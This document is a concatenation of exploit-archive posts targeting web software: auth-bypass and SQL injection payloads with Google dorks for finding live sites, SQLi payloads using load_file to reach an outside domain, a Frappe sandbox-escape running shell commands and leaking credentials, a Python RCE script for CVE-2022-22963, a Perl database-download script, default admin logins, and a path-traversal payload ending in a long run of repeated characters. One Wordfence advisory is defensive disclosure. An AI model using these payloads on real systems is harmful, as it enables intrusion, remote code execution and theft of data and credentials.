<pre><code>====================================================================================================================================<br />| # Title : Bayfront-CMS v1.0 Auth by pass Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 108.0(32-bit) |<br />| # Vendor : http://www.bayfrontwebdesign.com/ | <br />| # Dork : intext:"Site Designed and Hosted By: Bayfront Web Design" |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine .<br /><br />[+] Auth By pass :<br /><br />[+] http://127.0.0.1/www/erieconstructioncouncilcom/<br /><br /> User : 1'or'1'='1<br /> Pass : 1'or'1'='1<br /><br />[+] Sql :<br /><br /> http://target_site/member_profile.asp?record_id= inject her<br /><br />====Greetings to :=====================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : ARTISTRY LIMITED LMS v 0.5 Sql Injection Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) |<br />| # Vendor : http://www.artistrybd.net/ | <br />| # Dork : "Developed By ARTISTRY LIMITED" |<br />====================================================================================================================================<br /><br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine <br /><br />[+] Use Payload : home_details.php?home_id=1<br /> <br />[+] inject here : https://127.0.0.1/motherearthnet/home_details.php?home_id=1 <===== <br /> <br />====Greetings to :=========================================================================================================================<br />| jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh |<br />===========================================================================================================================================<br /></code></pre>
<pre><code>## Title: Vaidya-Mitra 1.0 Multiple - SQLi<br />## Author: nu11secur1ty<br />## Date: 07.12.2023<br />## Vendor: https://mayurik.com/<br />## Software: free:<br />https://www.sourcecodester.com/php/16720/free-hospital-management-system-small-practices.html,<br />https://mayurik.com/source-code/P5890/best-hospital-management-system-in-php<br />## Reference: https://portswigger.net/web-security/sql-injection<br /><br />## Description:<br />The `useremail` parameter appears to be vulnerable to SQL injection<br />attacks. The payload '+(select<br />load_file('\\\\lrg0fswvu3w11gp9rr7ek3b74yarylmcp0hn7bw.tupaputka.com\\mev'))+'<br />was submitted in the useremail parameter. This payload injects a SQL<br />sub-query that calls MySQL's load_file function with a UNC file path<br />that references a URL on an external domain. The application<br />interacted with that domain, indicating that the injected SQL query<br />was executed. The attacker easily can steal all information from this<br />system, like<br />login credentials, phone numbers and etc.<br /><br />STATUS: HIGH Vulnerability<br /><br />[+]Payload:<br />```mysql<br />---<br />Parameter: useremail (POST)<br /> Type: boolean-based blind<br /> Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY<br />or GROUP BY clause<br /> Payload: useremail=mayuri.infospace@gmail.com'+(select<br />load_file('\\\\lrg0fswvu3w11gp9rr7ek3b74yarylmcp0hn7bw.tupaputka.com\\mev'))+''<br />RLIKE (SELECT (CASE WHEN (5532=5532) THEN<br />0x6d61797572692e696e666f737061636540676d61696c2e636f6d+(select<br />load_file(0x5c5c5c5c6c726730667377767533773131677039727237656b33623734796172796c6d637030686e3762772e6f6173746966792e636f6d5c5c6d6576))+''<br />ELSE 0x28 END)) AND 'tsyu'='tsyu&userpassword=rootadmin<br /><br /> Type: error-based<br /> Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or<br />GROUP BY clause (FLOOR)<br /> Payload: useremail=mayuri.infospace@gmail.com'+(select<br />load_file('\\\\lrg0fswvu3w11gp9rr7ek3b74yarylmcp0hn7bw.tupaputka.com\\mev'))+''<br />AND (SELECT 3518 FROM(SELECT COUNT(*),CONCAT(0x716a766a71,(SELECT<br />(ELT(3518=3518,1))),0x71626a6b71,FLOOR(RAND(0)*2))x FROM<br />INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND<br />'gHln'='gHln&userpassword=rootadmin<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 OR time-based blind (query SLEEP)<br /> Payload: useremail=mayuri.infospace@gmail.com'+(select<br />load_file('\\\\lrg0fswvu3w11gp9rr7ek3b74yarylmcp0hn7bw.tupaputka.com\\mev'))+''<br />OR (SELECT 4396 FROM (SELECT(SLEEP(3)))iEbq) AND<br />'ZWBa'='ZWBa&userpassword=rootadmin<br />---<br /><br />```<br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2023/Vaidya-Mitra-1.0)<br /><br />## Proof and Exploit:<br />[href](https://www.nu11secur1ty.com/2023/07/vaidya-mitra-10-multiple-sqli.html)<br /><br />## Time spend:<br />00:27:00<br /><br /><br /></code></pre>
<pre><code>Description: User Registration <= 3.0.2 – Authenticated (Subscriber+) Arbitrary File Upload <br /><br />Affected Plugin: User Registration – Custom Registration Form, Login Form And User Profile For WordPress<br /><br />Plugin Slug: user-registration<br /><br />Affected Versions: <= 3.0.2<br /><br />CVE ID: CVE-2023-3342<br /><br />CVSS Score: 9.9 (Critical)<br /><br />CVSS Vector:CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H<br /><br />Researcher/s: Lana Codes <br /><br />Fully Patched Version: 3.0.2.1<br /><br />The User Registration plugin for WordPress is vulnerable to arbitrary file uploads due to a hardcoded encryption key and missing file type validation on the ‘ur_upload_profile_pic’ function in versions up to, and including, 3.0.2. This makes it possible for authenticated attackers with subscriber-level capabilities or above to upload arbitrary files on the affected site’s server which may make remote code execution possible. This was partially patched in version 3.0.2 and fully patched in version 3.0.2.1.<br /><br />Technical Analysis<br /><br />The User Registration plugin provides a versatile drag and drop registration form builder, with custom fields and unlimited customization options. It also provides a login form. After logging in, it provides users with a profile that allows various types of customization, including uploading a profile picture.<br /><br />Examining the code reveals that the plugin uses two separate functions to set the profile picture. The first AJAX function uploads the profile picture to a temp folder, and the second request moves the file and sets the profile picture to the user.<br /><br />The profile_pic_upload() function uses a generic image upload solution, which checks the file extension and then uploads the image to the temp folder. The interesting part is that the data from the uploaded file is encrypted within the AJAX response:<br /><br />[VIEW THIS CODE SNIPPET ON THE BLOG] <br /><br />JSON response after the file upload in the profile_pic_upload() function<br /><br />The encrypted upload_files data in the response is something like this:<br /><br />upload_files-response <br /><br />Encryption is used due to the way the plugin handles uploads because the encrypted data is decrypted and used to determine the filename and filepath where the file is saved for the user. However, for data to be encrypted and decrypted, an encryption key is required. As a general rule, encryption keys should be confidential and unique to each website.<br /><br />[VIEW THIS CODE SNIPPET ON THE BLOG] <br /><br />We unfortunately found that the encryption key is hardcoded in vulnerable versions of the plugin in the crypt_the_string() function, which means that threat actors also had access to the key which was not unique per WordPress installation. This makes it possible for attackers to craft an uploaded files data array payload that can be used to modify the filename, path, and extension when saving the profile picture.<br /><br />The plugin calls the function ur_upload_profile_pic() when saving the profile, which contains the following code:<br /><br />[VIEW THIS CODE SNIPPET ON THE BLOG] <br /><br />Rename and move the file in ur_upload_profile_pic() function<br /><br />The function decrypts the encrypted file data, which is specified in the save request. Based on this data, the file in the temp folder is moved and renamed using the rename() php function. Unfortunately, however, there is no file type check before it, which means that the image file can be renamed to a file with any type of extension, such as .php, .phtml, .html, and more.<br /><br />Exploit Possibilities<br /><br />Exploiting the vulnerability requires multiple complex steps, as two separate functions and requests must be used to upload and move the file:<br /><br />- Register a user<br />- Log in as the user (since it is only possible to upload a profile picture for the user)<br />- Upload the malicious exploit.png image file<br />- Retrieve the encrypted file data from the response<br />- Decrypt the file data<br />- Modify the file extension to php in the file name<br />- Encrypt the file data<br />- Save the profile with the encrypted and modified file data<br /><br />Since it is only possible to upload an image file during the upload process, because its extension is checked, the initial step involves uploading a file named, for example, exploit.png as a profile picture with the following request:<br /><br />user_registration_profile_pic_upload-http-request <br /><br />In this scenario, the attacker uploads an exploit.png file, which is actually a PHP script, but with a .png extension:<br /><br />[VIEW THIS CODE SNIPPET ON THE BLOG] <br /><br />The response will be a json payload containing the encrypted result returned from the profile_pic_upload() function. The ‘upload_files’ parameter needs to be decrypted using the hardcoded key, which will return a serialized array, similar to this:<br /><br />upload_files-array <br /><br />The attacker would then change the file name from exploit.png to exploit.php and re-encrypt the array. The newly encrypted result can then be used when saving the profile in the next request:<br /><br />save_profile_details-http-request <br /><br />The exploit renames the image file to php and moves it to the profile pictures folder.<br /><br />The complete exploit process looks like this:<br /><br />user-registration-howto-wordfence <br /><br />Wordfence Firewall<br /><br />The following graphic demonstrates the steps to exploitation an attacker might take and at which point the Wordfence firewall would block an attacker from successfully exploiting the vulnerability.<br /><br />user-registration-howto-wordfence-firewall <br /><br />Disclosure Timeline<br /><br />June 19, 2023 – Discovery of the Arbitrary File Upload vulnerability in User Registration.<br /><br />June 19, 2023 – We initiate contact with the plugin vendor asking that they confirm the inbox for handling the discussion.<br /><br />June 19, 2023 – The vendor confirms the inbox for handling the discussion.<br /><br />June 19, 2023 – We send over the full disclosure details. The vendor acknowledges the report and begins working on a fix.<br /><br />June 20, 2023 – Wordfence Premium, Care, and Response users receive a firewall rule to provide protection against any exploits that may target this vulnerability.<br /><br />June 29, 2023 – A partial patch is released in version 3.0.2.<br /><br />July 4, 2023 – A fully patched version of the plugin, 3.0.2.1, is released.<br /><br />July 20, 2023 – Wordfence Free users receive the same protection.<br /><br />Conclusion<br /><br />In this blog post, we detailed an Arbitrary File Upload vulnerability within the User Registration plugin affecting versions 3.0.2 and earlier. This vulnerability allows authenticated threat actors with subscriber-level permissions or higher to upload arbitrary files, including PHP backdoors, and execute those files on the server. The vulnerability has been fully addressed in version 3.0.2.1 of the plugin.<br /><br />We encourage WordPress users to verify that their sites are updated to the latest patched version of User Registration.<br /><br />Wordfence Premium, Wordfence Care, and Wordfence Response users received a firewall rule to protect against any exploits targeting this vulnerability on June 20, 2023. Sites still using the free version of Wordfence will receive the same protection on July 20, 2023.<br /><br />If you know someone who uses this plugin on their site, we recommend sharing this advisory with them to ensure their site remains secure, as this vulnerability poses a significant risk.<br /><br />For security researchers looking to disclose vulnerabilities responsibly and obtain a CVE ID, you can submit your findings to Wordfence Intelligence and potentially earn a spot on our leaderboard.<br /><br /></code></pre>
<pre><code># Exploit Title: Frappe Framework (ERPNext) 13.4.0 - Remote Code Execution (Authenticated)<br /># Exploit Author: Sander Ferdinand<br /># Date: 2023-06-07<br /># Version: 13.4.0<br /># Vendor Homepage: http://erpnext.org<br /># Software Link: https://github.com/frappe/frappe/<br /># Tested on: Ubuntu 22.04<br /># CVE : none<br /><br />Silly sandbox escape.<br /><br />> Frappe Framework uses the RestrictedPython library to restrict access to methods available for server scripts.<br /><br />Requirements:<br />- 'System Manager' role (which is not necessarily the admin)<br />- Server config `server_script_enabled` set to `true` (likely)<br /><br />Create a new script over at `/app/server-script`, set type to API, method to 'lol' and visit `/api/method/lol` to execute payload.<br /><br />```python3<br />hax = "echo pwned > /tmp/pwned"<br />g=({k:v('os').popen(hax).read() for k,v in g.gi_frame.f_back.f_back.f_back.f_back.f_builtins.items() if 'import' in k}for x in(0,))<br />for x in g:0<br />```<br /><br />Context: <br />- https://ur4ndom.dev/posts/2023-07-02-uiuctf-rattler-read/<br />- https://gist.github.com/lebr0nli/c2fc617390451f0e5a4c31c87d8720b6<br />- https://frappeframework.com/docs/v13/user/en/desk/scripting/server-script<br />- https://github.com/frappe/frappe/blob/v13.4.0/frappe/utils/safe_exec.py#L42<br /><br />Bonus:<br /><br />More recent versions (14.40.1 as of writing) block `gi_frame` but there is still a read primitive to escape the sandbox via `format_map`:<br /><br />```python3<br />hax = """<br />{g.gi_frame.f_back.f_back.f_back.f_back.f_back.f_back.f_back.f_back.f_back.f_back.f_back.f_back.f_back.f_globals[frappe].local.conf}<br />""".strip()<br /><br />g=(frappe.msgprint(hax.format_map({'g': g}))for x in(0,))<br />for x in g:0<br />```<br /><br />Which prints the Frappe config like database/redis credentials, etc.<br /><br />In the unlikely case that Werkzeug is running with `use_evalex`, you may use the above method to retreive the werkzeug secret PIN, then browse to `/console` (or raise an exception) for RCE.<br /><br /></code></pre>
<pre><code># Exploit Title: Spring Cloud 3.2.2 - Remote Command Execution (RCE)<br /># Date: 07/07/2023<br /># Exploit Author: GatoGamer1155, 0bfxgh0st<br /># Vendor Homepage: https://spring.io/projects/spring-cloud-function/<br /># Description: Exploit to execute commands exploiting CVE-2022-22963<br /># Software Link: https://spring.io/projects/spring-cloud-function<br /># CVE: CVE-2022-22963<br /><br />import requests, argparse, json<br /><br />parser = argparse.ArgumentParser()<br />parser.add_argument("--url", type=str, help="http://172.17.0.2:8080/functionRouter", required=True)<br />parser.add_argument("--command", type=str, help="ping -c1 172.17.0.1", required=True)<br />args = parser.parse_args()<br /><br />print("\n\033[0;37m[\033[0;33m!\033[0;37m] It is possible that the output of the injected command is not reflected in the response, to validate if the server is vulnerable run a ping or curl to the attacking host\n")<br /><br />headers = {"spring.cloud.function.routing-expression": 'T(java.lang.Runtime).getRuntime().exec("%s")' % args.command }<br />data = {"data": ""}<br /><br />request = requests.post(args.url, data=data, headers=headers)<br />response = json.dumps(json.loads(request.text), indent=2)<br />print(response)<br /> <br /><br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Banner RotatorCMS v1.0 Database Disclosure Exploit |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 108.0(32-bit) | <br />| # Vendor : http://ToastForums.com | <br />| # Dork : |<br />====================================================================================================================================<br /><br />poc :<br /><br />[-] Download the database: <br /><br /> The following Perl exploit will attempt to download the (acart.mdb ) file<br /> The (acart.mdb) It is the database and contains all the data .<br /> <br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] save code as perl file : poc.pl<br /><br />[+] code :<br /><br />#!/usr/bin/perl -w<br />#<br /># Banner RotatorCMS v1.0 Database Disclosure Exploit <br />#<br /># Author : indoushka<br />#<br /># Vondor : ToastForums.com<br /> <br /> <br /> <br />use LWP::Simple;<br />use LWP::UserAgent;<br /><br />system('cls');<br />print ('Banner RotatorCMS v1.0 Database Disclosure Exploit');<br />system('color a');<br /><br /><br />if(@ARGV < 2)<br />{<br />print "[-]How To Use\n\n";<br />&help; exit();<br />}<br />sub help()<br />{<br />print "[+] usage1 : perl $0 site.com /path/ \n";<br />print "[+] usage2 : perl $0 localhost / \n";<br />}<br />($TargetIP, $path, $File,) = @ARGV;<br /><br />$File="acart.mdb";<br />my $url = "http://" . $TargetIP . $path . $File;<br />print "\n Fuck you wait!!! \n\n";<br /><br />my $useragent = LWP::UserAgent->new();<br />my $request = $useragent->get($url,":content_file" => "D:/acart.mdb");<br /><br />if ($request->is_success)<br />{<br />print "[+] $url Exploited!\n\n";<br />print "[+] Database saved to D:/acart.mdb\n";<br />exit();<br />}<br />else<br />{<br />print "[!] Exploiting $url Failed !\n[!] ".$request->status_line."\n";<br />exit();<br />}<br /><br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* | <br />=======================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Avidi Media v2.0 - Ultimate Video, Music, Photo and Gif Sharing Script - nulled Insecure Settings Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit) | <br />| # Vendor : https://codecanyon.net/item/avidi-media-advanced-images-and-media-sharing-script/21944719 | <br />| # Dork : n/a |<br />====================================================================================================================================<br /><br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] USe Payload : Login : admin<br /> Password : admin123<br /><br />[+] http://127.0.0.1/mobimallaz/profile,admin<br /><br />====Greetings to :=========================================================================================================================<br />| jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh |<br />===========================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : AtTestimonials CMS v1.2 Missing Authentication Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.3(32-bit) |<br />| # Vendor : http://www.dl.persianscript.ir/script/atmanager-system(PersianScript.ir).zip |<br />| # Dork : © Copyright 2009 : All Rights Reserved Programmed and Developed by themeflash.com |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] appears to be missing authentication on the administrative interface<br /><br />[+] Use payload : /addnew.php<br /><br />[+] Add New Testimonials<br /><br />[+] http://wccpavingcouk/testimonials/addnew.php<br /><br />[+] Attach any file extension<br /><br />[+] http://dfwcarfixcom/testimonials/upload/084145ahmad.php<br /><br /><br />Greetings to :=================================================================<br />jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |<br />===============================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : AtomCMS 2.0 Directory traversal Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit) |<br />| # Vendor : https://github.com/thedigicraft/atomCMS/ | <br />| # Dork : Welcome to AtomCMS 2.0 |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine .<br /><br />[+] Directory traversal :<br /><br /> Directory Traversal is a vulnerability which allows attackers to access restricted directories and execute commands outside of the web server's<br /> root directory.<br /> <br />[+] Affected items :<br /><br /> /Atom/admin/ <br /> /Atom/admin/index.php <br /> <br />[+] The impact of this vulnerability :<br /><br /> By exploiting directory traversal vulnerabilities, attackers step out of the root directory and access files in other directories.<br /> As a result, attackers might view restricted files or execute commands, leading to a full compromise of the Web server.<br /><br />[+] How to fix this vulnerability :<br /><br /> Your script should filter metacharacters from user input.<br /><br /> Directory Traversal is a vulnerability which allows attackers to access restricted directories and execute commands outside of the web server's root directory.<br /> This vulnerability affects /Atom/admin/. <br /><br />[+] Attack details :<br /><br /> URL encoded GET input page was set to unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\<br /> File contents found: <br /> ; for 16-bit app support<br /><br />[+] http://localhost/Atom/admin/?page=unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\